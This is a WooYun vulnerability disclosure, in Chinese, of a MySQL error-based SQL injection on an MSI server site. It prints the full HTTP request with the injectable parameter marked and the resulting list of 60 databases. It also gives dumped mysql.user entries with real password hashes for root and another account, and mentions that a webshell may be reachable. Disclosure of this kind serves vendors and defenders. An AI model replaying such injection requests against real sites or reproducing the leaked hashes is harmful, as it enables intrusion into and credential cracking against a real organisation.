当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120196

漏洞标题:微星msi另一站点MySQL报错注入(root)

相关厂商:微星

漏洞作者: lijiejie

提交时间:2015-06-13 12:28

修复时间:2015-07-28 12:30

公开时间:2015-07-28 12:30

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

微星另一站点MySQL报错注入

详细说明:

POST /product/pages/list_ajax HTTP/1.1
Content-Length: 360
Content-Type: application/x-www-form-urlencoded
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223b4a613c9db6ea54f743f14ae1c9a457%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22220.181.109.191%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F28.0.1500.63+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1434115554%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D07644a2639b0160780b4ae0d67419fcc
Host: server.msi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
c=server&cid=*&d=list&p=product&sk=Server+Board&sw=ajax&title=Server+Board


cid可注入。

漏洞证明:

current database:    'msi_www_db'
available databases [60]:
[*] information_schema
[*] msi_al_db
[*] msi_ar_db
[*] msi_au_db
[*] msi_be_db
[*] msi_bg_db
[*] msi_br_db
[*] msi_ca_db
[*] msi_cafr_db
[*] msi_carib_db
[*] msi_cms
[*] msi_cn_db
[*] msi_csr
[*] msi_cz_db
[*] msi_de_db
[*] msi_dealer
[*] msi_dk_db
[*] msi_dk_db_bak
[*] msi_es_db
[*] msi_eu_db
[*] msi_fi_db
[*] msi_fr_db
[*] msi_gr_db
[*] msi_hu_db
[*] msi_in_db
[*] msi_it_db
[*] msi_jp_db
[*] msi_kr_db
[*] msi_latam_db
[*] msi_lk_db
[*] msi_mea_db
[*] msi_mx_db
[*] msi_mx_db_bak
[*] msi_my_db
[*] msi_nl_db
[*] msi_no_db
[*] msi_pl_db
[*] msi_pl_db_temp
[*] msi_pt_db
[*] msi_pt_db_back
[*] msi_raptor_db
[*] msi_ro_db
[*] msi_rs_db
[*] msi_ru_db
[*] msi_se_db
[*] msi_sk_db
[*] msi_th_db
[*] msi_tr_db
[*] msi_tw_db
[*] msi_ua_db
[*] msi_uk_db
[*] msi_us_db
[*] msi_vn_db
[*] msi_www_db
[*] msi_www_db_bak20150518
[*] msi_za_db
[*] mysql
[*] performance_schema
[*] root
[*] test


dump mysql.user表,两个用户的密码均未破解成功:

root        | <blank> | *92C1D9C9BCCE50690A8447295415750781153EED
172.16.16.% | msi_ap_user | <blank> | *F7C59E45D6D9357ABD9735D5F057B8F041CC3098


有一定的几率可得到webshell

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)